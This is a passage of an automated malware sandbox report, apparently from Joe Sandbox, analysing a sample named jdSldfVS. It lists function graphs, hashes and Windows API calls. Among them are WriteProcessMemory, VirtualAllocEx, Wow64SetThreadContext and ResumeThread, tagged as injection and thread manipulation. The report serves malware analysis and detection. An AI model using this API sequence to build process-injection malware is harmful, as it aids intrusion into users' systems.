1150->1151 1152 159bf6d-159bf74 1150->1152 1174 159bf90 call 159c3d8 1151->1174 1175 159bf90 call 159c3e8 1151->1175 1152->1151 1154 159bf76-159bf86 call 159b850 call 159b860 1152->1154 1154->1151 1155 159bf93-159bf96 1158 159bfb9-159bfbf 1155->1158 1159 159bf98-159bfb6 1155->1159 1159->1158 1171 159c0bc-159c0d0 1169->1171 1172 159c0b5-159c0bb 1169->1172 1170->1169 1172->1171 1174->1155 1175->1155 1176->1133 1177->1133
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0159C0A6
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205697017.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1590000_jdSldfVS.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 1e0589921a9c9e83e04dcec0c42d3b3a8212bed4b4fe985d34be08d39d580f50
                        • Instruction ID: 6ba17cac02cb299d80ddbf5d6a7c00d429c573e6135a8544b0dceed32752dc02
                        • Opcode Fuzzy Hash: 1e0589921a9c9e83e04dcec0c42d3b3a8212bed4b4fe985d34be08d39d580f50
                        • Instruction Fuzzy Hash: C1814970A00B058FEB24DF29E444B5ABBF5FF88204F00892DD55ADBA50D775E945CF92
                        Function 057226B0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1192 57226b0-5722716 1193 5722721-5722728 1192->1193 1194 5722718-572271e 1192->1194 1195 5722733-57227d2 CreateWindowExW 1193->1195 1196 572272a-5722730 1193->1196 1194->1193 1198 57227d4-57227da 1195->1198 1199 57227db-5722813 1195->1199 1196->1195 1198->1199 1203 5722820 1199->1203 1204 5722815-5722818 1199->1204 1205 5722821 1203->1205 1204->1203 1205->1205
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 057227C2
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2211797904.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_5720000_jdSldfVS.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: ac5de282a9ced1e634e192d8c7406b4bed29603e1d9db18da766f1755ff39e73
                        • Instruction ID: 6146574ec69ff75b673f59a3118c03b0d47cd2dc04d70f54e0f085705bddb4be
                        • Opcode Fuzzy Hash: ac5de282a9ced1e634e192d8c7406b4bed29603e1d9db18da766f1755ff39e73
                        • Instruction Fuzzy Hash: 9A41CEB5D043599FDB14CF9AC884ADEFBB5FF48310F24812AE819AB211D7719885CF90
                        Function 057226A4 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1178 57226a4-5722716 1179 5722721-5722728 1178->1179 1180 5722718-572271e 1178->1180 1181 5722733-572276b 1179->1181 1182 572272a-5722730 1179->1182 1180->1179 1183 5722773-57227d2 CreateWindowExW 1181->1183 1182->1181 1184 57227d4-57227da 1183->1184 1185 57227db-5722813 1183->1185 1184->1185 1189 5722820 1185->1189 1190 5722815-5722818 1185->1190 1191 5722821 1189->1191 1190->1189 1191->1191
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 057227C2
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2211797904.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_5720000_jdSldfVS.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: e6926b7202b5d5149121f8805b5baf236f20314c4179c378176053d6fcdc297d
                        • Instruction ID: 160722dbfd613a0c0799a60640e33372f3fee6040916d03786f51be26ea1c55c
                        • Opcode Fuzzy Hash: e6926b7202b5d5149121f8805b5baf236f20314c4179c378176053d6fcdc297d
                        • Instruction Fuzzy Hash: 9451CEB5C003599FDB14CFA9C984ADEBBB1FF48310F24812AE819AB211D775A945CF90
                        Function 01593414 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1206 1593414-1593415 1207 1593434-15934e1 CreateActCtxA 1206->1207 1208 1593417-1593431 1206->1208 1210 15934ea-1593544 1207->1210 1211 15934e3-15934e9 1207->1211 1208->1207 1218 1593553-1593557 1210->1218 1219 1593546-1593549 1210->1219 1211->1210 1220 1593559-1593565 1218->1220 1221 1593568 1218->1221 1219->1218 1220->1221 1222 1593569 1221->1222 1222->1222
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 015934D1
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205697017.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1590000_jdSldfVS.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: f2991bb7249a008fb93690bed0b9185984a46e1f2d0fda16766cf0f9caad579e
                        • Instruction ID: e42645b7904d42774548311bb45ec9bba0e8d43392593ea7d3780708463dce7d
                        • Opcode Fuzzy Hash: f2991bb7249a008fb93690bed0b9185984a46e1f2d0fda16766cf0f9caad579e
                        • Instruction Fuzzy Hash: 9D41EFB0C00618CFEF24CFA9C844BDEBBB5BF88704F20856AD508AB251DB756949CF91
                        Function 01591FB8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1224 1591fb8-15934e1 CreateActCtxA 1228 15934ea-1593544 1224->1228 1229 15934e3-15934e9 1224->1229 1236 1593553-1593557 1228->1236 1237 1593546-1593549 1228->1237 1229->1228 1238 1593559-1593565 1236->1238 1239 1593568 1236->1239 1237->1236 1238->1239 1240 1593569 1239->1240 1240->1240
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 015934D1
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205697017.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1590000_jdSldfVS.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: ec8c39cd416571d51a6e6ca36f869cf2aa1a67eeba33ece9b9234cf3493eeca6
                        • Instruction ID: c66383b5fd711a086862d3fc0859e2c0c626f2481034c1102af0605fa0ba9308
                        • Opcode Fuzzy Hash: ec8c39cd416571d51a6e6ca36f869cf2aa1a67eeba33ece9b9234cf3493eeca6
                        • Instruction Fuzzy Hash: 5441CFB0C0061DCBEB24DFAAC844BDEBBF5BF48704F20856AD508AB251DB756945CF91
                        Function 05724C7E Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1242 5724c7e-5724c8c 1243 5724c92-5724c97 1242->1243 1244 5724d3c-5724d5c call 5720254 1242->1244 1248 5724cea-5724d22 CallWindowProcW 1243->1248 1249 5724c99-5724cd0 1243->1249 1250 5724d5f-5724d6c 1244->1250 1251 5724d24-5724d2a 1248->1251 1252 5724d2b-5724d3a 1248->1252 1254 5724cd2-5724cd8 1249->1254 1255 5724cd9-5724ce8 1249->1255 1251->1252 1252->1250 1254->1255 1255->1250
                        APIs
                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05724D11
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2211797904.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_5720000_jdSldfVS.jbxd
                        Similarity
                        • API ID: CallProcWindow
                        • String ID:
                        • API String ID: 2714655100-0
                        • Opcode ID: a771ef0e267bcb55fc960603bd93f0ad8d9235da288cacbcd48271b1aefdfb45
                        • Instruction ID: 276ac286c4b4965714fe4f39d8edbfb81f6b43b877caf1b778f3bd543da81e18
                        • Opcode Fuzzy Hash: a771ef0e267bcb55fc960603bd93f0ad8d9235da288cacbcd48271b1aefdfb45
                        • Instruction Fuzzy Hash: 633105B9A00315CFDB14CF99C488AAABBF6FF88314F24C459D519AB321D774A841DFA0
                        Function 07AB0AAA Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1258 7ab0aaa-7ab0afe 1261 7ab0b0e-7ab0b4d WriteProcessMemory 1258->1261 1262 7ab0b00-7ab0b0c 1258->1262 1264 7ab0b4f-7ab0b55 1261->1264 1265 7ab0b56-7ab0b86 1261->1265 1262->1261 1264->1265
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07AB0B40
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 7a99b4b68df9e6329fbcf59f93a2bfee451dacbca9b5fd3867f85b21f4ed72c5
                        • Instruction ID: 857b28b8f4fd4ecb71174570afd9433d85ff5edc77d64a6142c5a2a7b00bb121
                        • Opcode Fuzzy Hash: 7a99b4b68df9e6329fbcf59f93a2bfee451dacbca9b5fd3867f85b21f4ed72c5
                        • Instruction Fuzzy Hash: AF215AB19003499FDB10DFA9C881BDFBBF4FF88314F10842AE918A7241C7789954CBA5
                        Function 07AB0AB0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1269 7ab0ab0-7ab0afe 1271 7ab0b0e-7ab0b4d WriteProcessMemory 1269->1271 1272 7ab0b00-7ab0b0c 1269->1272 1274 7ab0b4f-7ab0b55 1271->1274 1275 7ab0b56-7ab0b86 1271->1275 1272->1271 1274->1275
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07AB0B40
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 3c27dbfca6e6679bdfc09f3a81e887b4b478aebcb4df31e3f8a95354b0780f8c
                        • Instruction ID: 4c3614373c2b1be68d16e58bf004147a5c773af072a54d04e0243e005733ab2b
                        • Opcode Fuzzy Hash: 3c27dbfca6e6679bdfc09f3a81e887b4b478aebcb4df31e3f8a95354b0780f8c
                        • Instruction Fuzzy Hash: 132125B19003599FDB10DFAAC881BDFBBF5FF88314F10842AE919A7241C7799954CBA4
                        Function 07AB0B98 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1290 7ab0b98-7ab0c2d ReadProcessMemory 1294 7ab0c2f-7ab0c35 1290->1294 1295 7ab0c36-7ab0c66 1290->1295 1294->1295
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07AB0C20
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: c3cfa26f7d1c76e9b58cff4cd8f11e299762f2f761d848e2991067ddaa567b14
                        • Instruction ID: 09c90b476d829c9e5c3accf749051bde9b5cc3f20ccde0ccd2b2798829815069
                        • Opcode Fuzzy Hash: c3cfa26f7d1c76e9b58cff4cd8f11e299762f2f761d848e2991067ddaa567b14
                        • Instruction Fuzzy Hash: 012119B18003599FDB10DFAAD841BDFBBF5FF48310F10842AE518A7251C7399954CBA5
                        Function 07AB0910 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1279 7ab0910-7ab0963 1282 7ab0973-7ab09a3 Wow64SetThreadContext 1279->1282 1283 7ab0965-7ab0971 1279->1283 1285 7ab09ac-7ab09dc 1282->1285 1286 7ab09a5-7ab09ab 1282->1286 1283->1282 1286->1285
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AB0996
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: d2fa9dac18dcb9f5e8675969d7856cd543730d8a4e9c6923e118a9970b41ad38
                        • Instruction ID: 0e9807be399e9f48f714090352adce1fc3576f29f5c3d80d09800daef8e8e92c
                        • Opcode Fuzzy Hash: d2fa9dac18dcb9f5e8675969d7856cd543730d8a4e9c6923e118a9970b41ad38
                        • Instruction Fuzzy Hash: EA213AB19003499FEB10DFAAC4857EFBBF4EF88324F14842AD559A7241C7789944CFA5
                        Function 07AB0BA0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                        Download Yara Rule
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07AB0C20
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 0e74c5243a111b235f4f74c9790522b458edaf124d4d8b68b1fe3bf2b37b54cc
                        • Instruction ID: 10b26d488f325eb8fe8c0973edc59114f15a32079eb9bce54e98edb54670e7d4
                        • Opcode Fuzzy Hash: 0e74c5243a111b235f4f74c9790522b458edaf124d4d8b68b1fe3bf2b37b54cc
                        • Instruction Fuzzy Hash: 4F2128B18003599FDB10DFAAC881ADFFBF5FF48310F10842AE518A7251C7399950CBA5
                        Function 07AB0918 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                        Download Yara Rule
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AB0996
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: b069ffa7a253c898aa97cb969eaef1db30c5a63ed6a190f3e5bc9068b05084d9
                        • Instruction ID: 5bc845054ae1a2c052e6bd350fd9ba5e1fecbccc6d83268fcc89709db0adb675
                        • Opcode Fuzzy Hash: b069ffa7a253c898aa97cb969eaef1db30c5a63ed6a190f3e5bc9068b05084d9
                        • Instruction Fuzzy Hash: 0E2118B19003099FEB10DFAAC4857EFBBF4EF88364F14842AD559A7241C7789944CFA5
                        Function 0159E258 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0159E2DF
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205697017.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1590000_jdSldfVS.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 1c55e4a7aa428d7212a431b8537aed5cd7d553b845de7e7bbbc002b0ce7ec888
                        • Instruction ID: efdf88b05f207e483105a1ac5d3802e00448379e5bbff35ff1378f0127336942
                        • Opcode Fuzzy Hash: 1c55e4a7aa428d7212a431b8537aed5cd7d553b845de7e7bbbc002b0ce7ec888
                        • Instruction Fuzzy Hash: 9D21E4B59002599FDF10CF9AD884ADEFBF4FB48310F14841AE914A7310D375A954CFA5
                        Function 0159B888 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0159C121,00000800,00000000,00000000), ref: 0159C332
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205697017.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1590000_jdSldfVS.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: f76a441c438d45b8d6147e4663b0666ec680d9b385b0b7a11cc0da1fd4faa065
                        • Instruction ID: 047d9fa2882e3f7e21c1498db71d679a44316f6bf0f91855217f25a3ddaefa1d
                        • Opcode Fuzzy Hash: f76a441c438d45b8d6147e4663b0666ec680d9b385b0b7a11cc0da1fd4faa065
                        • Instruction Fuzzy Hash: 1611E2B69043499FDF14DF9AC444ADEFBF4FB88320F14846AE519AB200C379A945CFA5
                        Function 07AB09EA Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07AB0A5E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: f6c88b5d6b3c811a51526f02c91ebb067a5463edc2b66d4f6c9615b6ea8287f0
                        • Instruction ID: ed27c7fbdc3deee3aac3ee67b609c3cdc8505e268668a2169de6aed8208ad264
                        • Opcode Fuzzy Hash: f6c88b5d6b3c811a51526f02c91ebb067a5463edc2b66d4f6c9615b6ea8287f0
                        • Instruction Fuzzy Hash: DB1159728002499FDB10DFAAC845BDFBBF5EF88324F148819E525A7250C7759550CFA5
                        Function 0159C2C0 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0159C121,00000800,00000000,00000000), ref: 0159C332
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205697017.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1590000_jdSldfVS.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: a94bb824fae56cd8b0b4de6402bdd27bd95dbb0a545dc880fec8f1de26fb9fd7
                        • Instruction ID: 3ac18496e699793168d63100ad423ec03c0822b4a82fd71766d233f05969d359
                        • Opcode Fuzzy Hash: a94bb824fae56cd8b0b4de6402bdd27bd95dbb0a545dc880fec8f1de26fb9fd7
                        • Instruction Fuzzy Hash: C81126B6800349DFDB10DF9AC484ADEFBF4FB88320F14842AD559A7210C379A545CFA5
                        Function 07AB09F0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07AB0A5E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 8bd12f4a6b09f8b12378edeeb92abb881a7632218a70531418e99160baa13817
                        • Instruction ID: b8ad15edd1b5aaa02c95867acdeab3517b6e16c848ea826ec605132f54149da6
                        • Opcode Fuzzy Hash: 8bd12f4a6b09f8b12378edeeb92abb881a7632218a70531418e99160baa13817
                        • Instruction Fuzzy Hash: 7C1137728003499FDB10DFAAC845BDFBBF5EF88720F148819E515A7250C7759950CFA5
                        Function 07AB0868 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: ec8b187649ea05f0ddc8fce24a560149c7ea21fd75e9f20d198a791edc3e8469
                        • Instruction ID: 2f4fe4bd6ea6ce57c58c3cb522e287a9de0d304489ab044002c74a66c691cd21
                        • Opcode Fuzzy Hash: ec8b187649ea05f0ddc8fce24a560149c7ea21fd75e9f20d198a791edc3e8469
                        • Instruction Fuzzy Hash: 3A1128B19003498FDB20DFAAC4457DFFBF4EB88724F248819D519A7240C775A944CF95
                        Function 0159C040 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0159C0A6
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205697017.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1590000_jdSldfVS.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: cac97fc9e9146e4b450ba0276b9cb4cdccf2e05285816d60cc9667c8c32c5859
                        • Instruction ID: f1e4c09094d4c6d731eea0b75bb42d6fb1682023c0ef9d87bcaccdcec83d3b77
                        • Opcode Fuzzy Hash: cac97fc9e9146e4b450ba0276b9cb4cdccf2e05285816d60cc9667c8c32c5859
                        • Instruction Fuzzy Hash: E61110B5C007498FDB10DF9AC444ADEFBF4BB89320F10841AD918B7210C37AA545CFA2
                        Function 07AB2B64 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07AB498D
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: e83b8b0f609370a783bc15a841701a5bacc115b909bbcb9ae998ebbff27516bf
                        • Instruction ID: 15dddcc3b518ead0ad4f24ec222b8f5e57fd8d7a968aeff972c6f9326d923ec2
                        • Opcode Fuzzy Hash: e83b8b0f609370a783bc15a841701a5bacc115b909bbcb9ae998ebbff27516bf
                        • Instruction Fuzzy Hash: B911F2B58003499FDB20DF9AD844BDEFBF8EB48320F10841AE568A7201C375A944CFA5
                        Function 07AB0860 Relevance: 1.5, APIs: 1, Instructions: 47threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 62850f03201a92f7a7677c7c67a4be00c189b60173020051b0219ae1e3c17fb2
                        • Instruction ID: d185b049913aa2b25e6b57ac19caf00debc607a83d8ca72a841c34c58b3eafc8
                        • Opcode Fuzzy Hash: 62850f03201a92f7a7677c7c67a4be00c189b60173020051b0219ae1e3c17fb2
                        • Instruction Fuzzy Hash: AD1158B19043898FDB20DFA9C4417EEFBF0AF84314F24885EC155A7251C7759544CF95
                        Function 07AB492A Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07AB498D
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: b4eeaeb1fc20511f9b742bf652aad8d7942664e720fd4e787f40d26c2bb819a2
                        • Instruction ID: 542e1c3422c126db8cd7a06351d15941b7c33dd04b501abed836f83b06d2f1b2
                        • Opcode Fuzzy Hash: b4eeaeb1fc20511f9b742bf652aad8d7942664e720fd4e787f40d26c2bb819a2
                        • Instruction Fuzzy Hash: DE11C5B58003499FDB20DF9AD445BDEFBF8EB48324F20841AE564A7611C375A544CFA5
                        Function 0153D1FC Relevance: .1, Instructions: 76COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205456814.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_153d000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 53c30014ec2276cc114ce1fb5e8ae5da62b2a5bd0a3a4502c49784eadbe442b3
                        • Instruction ID: 6b21d07e1ee296ea43e085c131404effae281a2faecf51cae0794c1d1137e33d
                        • Opcode Fuzzy Hash: 53c30014ec2276cc114ce1fb5e8ae5da62b2a5bd0a3a4502c49784eadbe442b3
                        • Instruction Fuzzy Hash: 1C21E072504200DFDB069F94D980B2ABBB5FBC8320F608569F9090F246C336D456CBA1
                        Function 0153D3D8 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205456814.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_153d000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 865fd7f929ccb5c39d8d86338ccdd6922dd32af2a7b7e8bad114e8dc57bd794e
                        • Instruction ID: fadb2c8625fcff3785d97e8c6775b214e628b710517c5630a9f8e39fc74f614e
                        • Opcode Fuzzy Hash: 865fd7f929ccb5c39d8d86338ccdd6922dd32af2a7b7e8bad114e8dc57bd794e
                        • Instruction Fuzzy Hash: 45210072100204DFDB01DF54D980B5ABBB5FBC8324F208568E9090F256C37AE456CAA1
                        Function 0154D1D4 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205516316.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_154d000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 798ea4750bd5e4c4febb364ca9a7d4d01010f53aac061362c67b30b8108c76f7
                        • Instruction ID: e23ae56762f4e14de1e3b0c7239deacfbf8f2a1eefe3be1b4156aec7a15bd19e
                        • Opcode Fuzzy Hash: 798ea4750bd5e4c4febb364ca9a7d4d01010f53aac061362c67b30b8108c76f7
                        • Instruction Fuzzy Hash: 3721D771608204EFDB05DF94D5C4B1ABBB5FB94328F24CA6DE9094F252C37AD446CA61
                        Function 0154D01C Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205516316.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_154d000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e8b599259587d6fac404dc38d9862fa7f22170c24996c1aa2d9c7ae93c06da5d
                        • Instruction ID: 5501b2d873dd08f95c361b9345644bbc603cb47cf8380ef63a5eee0847acc4ab
